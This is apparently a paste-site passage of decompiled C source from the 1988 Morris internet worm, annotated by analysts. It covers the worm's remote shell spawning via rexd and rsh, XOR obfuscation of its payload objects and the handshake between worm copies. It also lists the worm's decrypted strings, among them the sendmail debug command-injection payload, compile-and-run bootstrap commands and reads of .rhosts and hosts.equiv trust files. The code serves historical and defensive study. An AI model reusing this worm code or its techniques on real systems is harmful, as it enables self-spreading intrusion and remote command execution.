  933.    
  934.     if (username[0] == '\0')
  935.     strcpy(username, alt_username);
  936.    
  937.     for (i = 0; username[i]; i++)
  938.     if (ispunct(username[i]) || username[i] < ' ')
  939.         return 0;
  940.     other_sleep(1);
  941.    
  942.     fd_for_sh = x538e(host, username, &alt_username[30]);
  943.     if (fd_for_sh >= 0) {
  944.     result = talk_to_sh(host, fd_for_sh, fd_for_sh);
  945.     close(fd_for_sh);
  946.     return result;
  947.     }
  948.     if (fd_for_sh == -2)
  949.     return 0;
  950.    
  951.     fd_for_sh = x538e(me, alt_username, &alt_username[30]);
  952.     if (fd_for_sh >= 0) {
  953.     sprintf(buffer2, XS("exec /usr/ucb/rsh %s -l %s \'exec /bin/sh\'\n"),
  954.         host->hostname, username);
  955.     send_text(fd_for_sh, buffer2);
  956.     sleep(10);
  957.     result = 0;
  958.     if (test_connection(fd_for_sh, fd_for_sh, 25))  /* 508 */
  959.         result = talk_to_sh(host, fd_for_sh, fd_for_sh);
  960.     close(fd_for_sh);
  961.     return result;
  962.     }
  963.     return 0;
  964. }
  965.  
  966. /* Used in hu1.  Returns a file descriptor. */
  967. /* It goes through the six connections in host trying to connect to the
  968.  * remote execution server on each one.
  969.  */
  970. static int x538e(host, name1, name2)
  971.      struct hst *host;
  972.      char *name1, *name2;
  973. {
  974.     int s, i;
  975.     struct sockaddr_in sin;         /* 16 bytes */
  976.     int l6, l7;
  977.     char in_buf[512];
  978.    
  979.     for (i = 0; i < 6; i++) {           /* 552,762 */
  980.     if (host->o48[i] == 0)
  981.         continue;               /* 754 */
  982.     s = socket(AF_INET, SOCK_STREAM, 0);
  983.     if (s < 0)
  984.         continue;
  985.    
  986.     bzero(&sin, sizeof(sin));       /* 16 */
  987.     sin.sin_family = AF_INET;
  988.     sin.sin_addr.s_addr = host->o48[i];
  989.     sin.sin_port = IPPORT_EXECSERVER;   /* Oh shit, looking for rexd */
  990.    
  991.     alarm(8);
  992.     signal(SIGALRM, justreturn);
  993.     if (connect(s, &sin, sizeof(sin)) < 0) {
  994.         alarm(0);
  995.         close(s);
  996.         continue;
  997.     }
  998.     alarm(0);
  999.     break;
  1000.     }
  1001.     if (i >= 6)
  1002.     return -2;              /* 1048 */
  1003.     /* Check out the connection by writing a null */
  1004.     if (write(s, XS(""), 1) == 1) {
  1005.     /* Tell the remote execution deamon the hostname, username, and to star
  1006. tup
  1007.        "/bin/sh". */
  1008.     write(s, name1, strlen(name1) + 1);
  1009.     write(s, name2, strlen(name2) + 1);
  1010.     if ((write(s, XS("/bin/sh"), strlen(XS("/bin/sh"))+1) >= 0) &&
  1011.         xread(s, in_buf, 1, 20) == 1  &&
  1012.         in_buf[0] == '\0' &&
  1013.         test_connection(s, s, 40) != 0)
  1014.         return s;
  1015.     }
  1016.     close(s);
  1017.     return -1;
  1018. }
  1019.  
  1020. /* Reads in a file and puts it in the 'objects' array.  Returns 1 if sucessful
  1021. ,
  1022.  * 0 if not. */
  1023. loadobject(obj_name)                /* x5594 */
  1024.      char *obj_name;
  1025. {
  1026.     int fd;
  1027.     unsigned long size;
  1028.     struct stat statbuf;
  1029.     char *object_buf, *suffix;
  1030.     char local[4];
  1031.    
  1032.     fd = open(obj_name, O_RDONLY);
  1033.     if (fd < 0)
  1034.     return 0;               /* 378 */
  1035.     if (fstat(fd, &statbuf) < 0) {
  1036.     close(fd);
  1037.     return 0;
  1038.     }
  1039.     size = statbuf.st_size;
  1040.     object_buf = malloc(size);
  1041.     if (object_buf == 0) {
  1042.     close(fd);
  1043.     return 0;
  1044.     }
  1045.     if (read(fd, object_buf, size) != size) {
  1046.     free(object_buf);
  1047.     close(fd);
  1048.     return 0;
  1049.     }
  1050.     close(fd);
  1051.     xorbuf(object_buf, size);
  1052.     suffix = index(obj_name, ',');
  1053.     if (suffix != NULL)
  1054.     suffix+=1;
  1055.     else
  1056.     suffix = obj_name;
  1057.     objects[nobjects].name = strcpy(malloc(strlen(suffix)+1), suffix);
  1058.     objects[nobjects].size = size;
  1059.     objects[nobjects].buf = object_buf;
  1060.     nobjects += 1;
  1061.     return 1;
  1062. }
  1063.  
  1064. /* Returns the object from the 'objects' array that has name, otherwise NULL.
  1065. */
  1066. object *getobjectbyname(name)
  1067.      char *name;
  1068. {
  1069.     int i;
  1070.    
  1071.     for (i = 0; i < nobjects; i++)
  1072.     if (strcmp(name, objects[i].name) == 0)
  1073.         return &objects[i];
  1074.     return NULL;
  1075. }
  1076.  
  1077. /* Encodes and decodes the binary coming over the socket. */
  1078. xorbuf(buf, size)               /* 0x577e */
  1079.      char *buf;
  1080.      unsigned long size;
  1081. {
  1082.     char *addr_self;            /* The address of the xorbuf fuction */
  1083.     int i;
  1084.    
  1085.     addr_self = (char *)xorbuf;
  1086.     i = 0;
  1087.     while (size-- > 0) {
  1088.     *buf++ ^= addr_self[i];
  1089.     i = (i+1) % 10;
  1090.     }
  1091.     return;
  1092. }
  1093.  
  1094.  
  1095. static other_fd = -1;
  1096.  
  1097. /* Make a connection to the local machine and see if I'm running in
  1098.    another process by sending a magic number on a random port and waiting
  1099.    five minutes for a reply. */
  1100. checkother()                    /* 0x57d0 */
  1101. {
  1102.     int s, l8, l12, l16, optval;
  1103.     struct sockaddr_in sin;         /* 16 bytes */
  1104.    
  1105.     optval = 1;
  1106.     if ((random() % 7) == 3)
  1107.     return;                 /* 612 */
  1108.    
  1109.     s = socket(AF_INET, SOCK_STREAM, 0);
  1110.     if (s < 0)
  1111.     return;
  1112.    
  1113.     /* Make a socket to the localhost, using a link-time specific port */
  1114.     bzero(&sin, sizeof(sin));       /* 16 */
  1115.     sin.sin_family = AF_INET;
  1116.     sin.sin_addr.s_addr = inet_addr(XS("127.0.0.1")); /* <other_fd+4> */
  1117.     sin.sin_port = 0x00005b3d;          /* ??? */
  1118.    
  1119.     if (connect(s, &sin, sizeof(sin)) < 0) {
  1120.     close(s);
  1121.     } else {
  1122.     l8 = MAGIC_2;           /* Magic number??? */
  1123.     if (write(s, &l8, sizeof(l8)) != sizeof(l8)) {
  1124.         close(s);
  1125.         return;
  1126.     }
  1127.     l8 = 0;
  1128.     if (xread(s, &l8, sizeof(l8), 5*60) != sizeof(l8)) {
  1129.         close(s);
  1130.         return;
  1131.     }
  1132.     if (l8 != MAGIC_1) {
  1133.         close(s);
  1134.         return;
  1135.     }
  1136.    
  1137.     l12 = random()/8;
  1138.     if (write(s, &l12, sizeof(l12)) != sizeof(l12)) {
  1139.         close(s);
  1140.         return;
  1141.     }
  1142.    
  1143.     if (xread(s, &l16, sizeof(l16), 10) != sizeof(l16)) {
  1144.         close(s);
  1145.         return;
  1146.     }
  1147.    
  1148.     if (!((l12+l16) % 2))
  1149.         pleasequit++;
  1150.     close(s);
  1151.     }
  1152.     sleep(5);
  1153.    
  1154.     s = socket(AF_INET, SOCK_STREAM, 0);
  1155.     if (s < 0)
  1156.     return;
  1157.    
  1158.     /* Set the socket so that the address may be reused */
  1159.     setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof(optval));
  1160.     if (bind(s, &sin, sizeof(sin)) < 0) {
  1161.     close(s);
  1162.     return;
  1163.     }
  1164.     listen(s, 10);
  1165.    
  1166.     other_fd = s;
  1167.     return;
  1168. }
  1169.  
  1170. /* Sleep, waiting for another worm to contact me. */
  1171. other_sleep(how_long)               /* 0x5a38 */
  1172. {
  1173.     int nfds, readmask;
  1174.     long time1, time2;
  1175.     struct timeval timeout;
  1176.    
  1177.     if (other_fd < 0) {
  1178.     if (how_long != 0)
  1179.         sleep(how_long);
  1180.     return;
  1181.     }
  1182.     /* Check once again.. */
  1183.     do {
  1184.     if (other_fd < 0)
  1185.         return;
  1186.     readmask = 1 << other_fd;
  1187.     if (how_long < 0)
  1188.         how_long = 0;
  1189.    
  1190.     timeout.tv_sec = how_long;
  1191.     timeout.tv_usec = 0;
  1192.    
  1193.     if (how_long != 0)
  1194.         time(&time1);
  1195.     nfds = select(other_fd+1, &readmask, 0, 0, &timeout);
  1196.     if (nfds < 0)
  1197.         sleep(1);
  1198.     if (readmask != 0)
  1199.         answer_other();
  1200.     if (how_long != 0) {
  1201.         time(&time2);
  1202.         how_long -= time2 - time1;
  1203.     }
  1204.     } while (how_long > 0);
  1205.     return;
  1206. }
  1207.  
  1208. static answer_other()               /* 0x5b14 */
  1209. {
  1210.     int ns, addrlen, magic_holder, magic1, magic2;
  1211.     struct sockaddr_in sin;         /* 16 bytes */
  1212.    
  1213.     addrlen = sizeof(sin);
  1214.    
  1215.     ns = accept(other_fd, &sin, &addrlen);
  1216.    
  1217.     if (ns < 0)
  1218.     return;                 /* 620 */
  1219.    
  1220.     magic_holder = MAGIC_1;
  1221.     if (write(ns, &magic_holder, sizeof(magic_holder)) != sizeof(magic_holder)
  1222. ) {
  1223.     close(ns);
  1224.     return;
  1225.     }
  1226.     if (xread(ns, &magic_holder, sizeof(magic_holder), 10) != sizeof(magic_holder)) {
  1227.     close(ns);
  1228.     return;
  1229.     }
  1230.     if (magic_holder != MAGIC_2) {
  1231.     close(ns);
  1232.     return;
  1233.     }
  1234.    
  1235.     magic1 = random() / 8;
  1236.     if (write(ns, &magic1, sizeof(magic1)) != sizeof(magic1)) {
  1237.     close(ns);
  1238.     return;
  1239.     }
  1240.     if (xread(ns, &magic2, sizeof(magic2), 10) != sizeof(magic2)) {
  1241.     close(ns);
  1242.     return;
  1243.     }
  1244.     close(ns);
  1245.    
  1246.     if (sin.sin_addr.s_addr != inet_addr(XS("127.0.0.1")))
  1247.     return;
  1248.    
  1249.     if (((magic1+magic2) % 2) != 0) {
  1250.     close(other_fd);
  1251.     other_fd = -1;
  1252.     pleasequit++;
  1253.     }
  1254.     return;
  1255. }
  1256.  
  1257. /* A timeout-based read. */
  1258. xread(fd, buf, length, time)            /* 0x5ca8 */
  1259.      int fd, time;
  1260.      char *buf;
  1261.      unsigned long length;
  1262. {
  1263.     int i, cc, readmask;
  1264.     struct timeval timeout;
  1265.     int nfds;
  1266.     long time1, time2;
  1267.    
  1268.     for (i = 0; i < length; i++) {      /* 150 */
  1269.     readmask = 1 << fd;
  1270.     timeout.tv_sec = time;
  1271.     timeout.tv_usec = 0;
  1272.     if (select(fd+1, &readmask, 0, 0, &timeout) < 0)
  1273.         return 0;               /* 156 */
  1274.     if (readmask == 0)
  1275.         return 0;
  1276.     if (read(fd, &buf[i], 1) != 1)
  1277.         return 0;
  1278.     }
  1279.     return i;
  1280. }
  1281.  
  1282.  
  1283. /* These are some of the strings that are encyphed in the binary.  The
  1284.  * person that wrote the program probably used the Berkeley 'xstr' program
  1285.  * to extract and encypher the strings.
  1286.  */
  1287. #ifdef notdef
  1288. char environ[50] = "";
  1289. char *sh = "sh";
  1290. char *env52 = "sh";         /* 0x20034, <environ+52> */
  1291. char *env55 = "-p";
  1292. char *env58 = "l1.c";
  1293. char *env63 = "sh";
  1294. char *env66 = "/tmp/.dump";
  1295. char *env77 = "128.32.137.13";
  1296. char *env91 = "127.0.0.1";
  1297. char *env102 = "/usr/ucb/netstat -r -n";    /* 0x20066 */
  1298. char *env125 = "r";
  1299. char *env127 = "%s%s";
  1300. #endif /* notdef*/
  1301. /*
  1302.   char *text =
  1303.   "default
  1304.   0.0.0.0
  1305.   127.0.0.1
  1306.   exec /bin/sh
  1307.   l1.c
  1308.   PATH=/bin:/usr/bin:/usr/ucb
  1309.   cd /usr/tmp
  1310.   x%d.c
  1311.   echo gorch49;sed '/int zz;/q' > %s;echo gorch50
  1312.   gorch49
  1313.   int zz;
  1314.   gorch50
  1315.   cc -o x%d x%d.c;./x%d %s %d %d;rm -f x%d x%d.c;echo DONE
  1316.   DONE
  1317.   x%d,%s
  1318.   PATH=/bin:/usr/bin:/usr/ucb
  1319.   rm -f sh
  1320.   if [ -f sh ]
  1321.   then
  1322.   P=x%d
  1323.   else
  1324.   P=sh
  1325.   cc -o $P %s
  1326.   ./$P -p $$
  1327.   rm -f $P
  1328.   rm -f %s $P
  1329.   l1.c
  1330.   cd /usr/tmp
  1331.   x%d.c
  1332.   cat > %s <<'EOF'
  1333.   cc -o x%d x%d.c;x%d %s %d %d;rm -f x%d x%d.c
  1334.   /usr/ucb/rsh
  1335.   /usr/bin/rsh
  1336.   /bin/rsh
  1337.   /bin/echo %s
  1338.   debug
  1339.   mail from:</dev/null>
  1340.   rcpt to:<"| sed '1,/^$/d' | /bin/sh ; exit 0">
  1341.   data
  1342.   quit
  1343.   quit
  1344.   exec /usr/ucb/rsh %s -l %s 'exec /bin/sh'
  1345.   /bin/sh
  1346.   /bin/sh
  1347.   127.0.0.1
  1348.   127.0.0.1
  1349.   /etc/hosts.equiv
  1350.   %.100s
  1351.   /.rhosts
  1352.   %.200s/.forward
  1353.   %.20s%.20s
  1354.   %[^ ,]
  1355.   %*s %[^ ,]s
  1356.   %.200s/.forward
  1357.   %.200s/.rhosts
  1358.   %s%s
  1359.   /usr/dict/words";
  1360.   */
  1361.  
  1362. /*
  1363.  * Local variables:
  1364.  * compile-command: "cc -S hs.c"
  1365.  * comment-column: 48
  1366.  * End:
  1367.  */
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement